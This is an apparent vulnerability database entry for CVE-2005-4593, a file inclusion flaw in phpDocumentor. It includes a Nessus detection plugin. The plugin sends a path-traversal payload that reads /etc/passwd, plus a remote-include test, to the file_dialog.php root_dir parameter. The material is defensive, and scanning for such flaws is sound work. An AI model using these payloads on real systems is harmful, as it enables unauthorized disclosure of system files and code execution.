Vulnerabilities > CVE-2005-4593 - Remote and Local File Include vulnerability in PHPDocumentor

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
joshua-eichorn
nessus
exploit available
NVD
Published: 2005-12-31
Updated: 2018-10-19

Summary

PHP remote file inclusion vulnerability in phpDocumentor 1.3.0 rc4 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary code via a URL in the (1) FORUM[LIB] parameter in Documentation/tests/bug-559668.php and (2) the root_dir parameter in docbuilder/file_dialog.php.

Vulnerable Configurations

Part Description Count
Application
Joshua_Eichorn
6

Exploit-Db

descriptionphpDocumentor <= 1.3.0 rc4 Remote Commands Execution Exploit. CVE-2005-4593. Webapps exploit for php platform
idEDB-ID:1395
last seen2016-01-31
modified2005-12-29
published2005-12-29
reporterrgod
sourcehttps://www.exploit-db.com/download/1395/
titlephpDocumentor <= 1.3.0 rc4 - Remote Commands Execution Exploit

Nessus

NASL familyCGI abuses
NASL idPHPDOCUMENTOR_1_3_REMOTE_FILE_INCLUSION.NASL
descriptionphpDocumentor is a automatic documentation generator for PHP. The remote host appears to be running the web-interface of phpDocumentor. This version does not properly sanitize user input in the
last seen2020-06-01
modified2020-06-02
plugin id20374
published2006-01-02
reporterThis script is Copyright (C) 2006-2018 Ferdy Riphagen
sourcehttps://www.tenable.com/plugins/nessus/20374
titlephpDocumentor <= 1.3.0 RC4 Local And Remote File Inclusion
code
#
# Script Written By Ferdy Riphagen 
# <f[dot]riphagen[at]nsec[dot]nl>
#
# Script distributed under the GNU GPLv2 License.
#

# Changes by Tenable:
# - Revised plugin title (9/29/11)

include("compat.inc");

if (description) {
 script_id(20374);
 script_version("1.20");
 script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");

 script_cve_id("CVE-2005-4593");
 script_bugtraq_id(16080);

 script_name(english:"phpDocumentor <= 1.3.0 RC4 Local And Remote File Inclusion");
 script_summary(english:"Check if phpDocumentor is vulnerable to remote file inclusion flaws");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that is prone to file
inclusion flaws." );
 script_set_attribute(attribute:"description", value:
"phpDocumentor is a automatic documentation generator for PHP. 

The remote host appears to be running the web-interface of
phpDocumentor. 

This version does not properly sanitize user input in the
'file_dialog.php' file and a test file called 'bug-559668.php' It is
possible for an attacker to include remote files and execute arbitrary
commands on the remote system, and display the content of sensitive
files. 

This flaw is exploitable if PHP's 'register_globals' setting is
enabled." );
 # https://web.archive.org/web/20120402145130/http://retrogod.altervista.org/phpdocumentor_130rc4_incl_expl.html
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?f75f8606" );
 script_set_attribute(attribute:"see_also", value:"https://marc.info/?l=bugtraq&m=113587730223824&w=2");
 script_set_attribute(attribute:"solution", value:
"Disable PHP's 'register_globals' setting." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");
 script_set_attribute(attribute:"plugin_publication_date", value: "2006/01/02");
 script_set_attribute(attribute:"vuln_publication_date", value: "2005/12/29");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe",value:"cpe:/a:joshua_eichorn:phpdocumentor");
 script_end_attributes();

 script_category(ACT_ATTACK);
 script_family(english:"CGI abuses");

 script_copyright(english:"This script is Copyright (C) 2006-2020 Ferdy Riphagen");

 script_dependencie("http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 script_require_keys("www/PHP");
 exit(0);
}

include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");

port = get_http_port(default:80, embedded:TRUE);
if (get_kb_item("Services/www/"+port+"/embedded")) exit(0);
if (!can_host_php(port:port)) exit(0);

# Check a few directories.
if (thorough_tests) dirs = list_uniq(make_list("/phpdocumentor", "/phpdoc", "/PhpDocumentor", cgi_dirs()));
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{ 
 # Check if we can find phpDocumentor installed. 
 res = http_keepalive_send_recv(data:http_get(port:port, item:string(dir, "/docbuilder/top.php")), port:port);
 #debug_print("res: ", res, "\n");
 if (res == NULL) exit(0);

 if (egrep(pattern:"docBuilder.*phpDocumentor v[0-9.]+.*Web Interface", string:res))
 {
  # Try the local file inclusion flaw.
  exploit[0] = "../../../../../../../etc/passwd%00";
  result = "root:.*:0:[01]:.*:";
  error = "Warning.*main.*/etc/passwd.*failed to open stream";
 
  if (thorough_tests)
  {
   # Try to grab a remote file.
   exploit[1] = string("http://", get_host_name(), "/robots.txt%00");
   result = "root:.*:0:[01]:.*:|User-agent:";  
   error = "Warning.*main.*/etc/passwd.*failed to open stream|Warning.*/robots.txt.*failed to open stream"; 
  }

  for(exp = 0; exploit[exp]; exp++) 
  {
   req = http_get(item:string(dir, "/docbuilder/file_dialog.php?root_dir=", exploit[exp]), port:port);
   #debug_print("req: ", req, "\n");
   
   recv = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
   if (recv == NULL) exit(0);
   
   if (egrep(pattern:result, string:recv) ||
       # Check if there is a error that the file can not be found.
       egrep(pattern:error, string:recv)) 
   {
    security_hole(port);
    exit(0);
   } 
  }
 }
}

References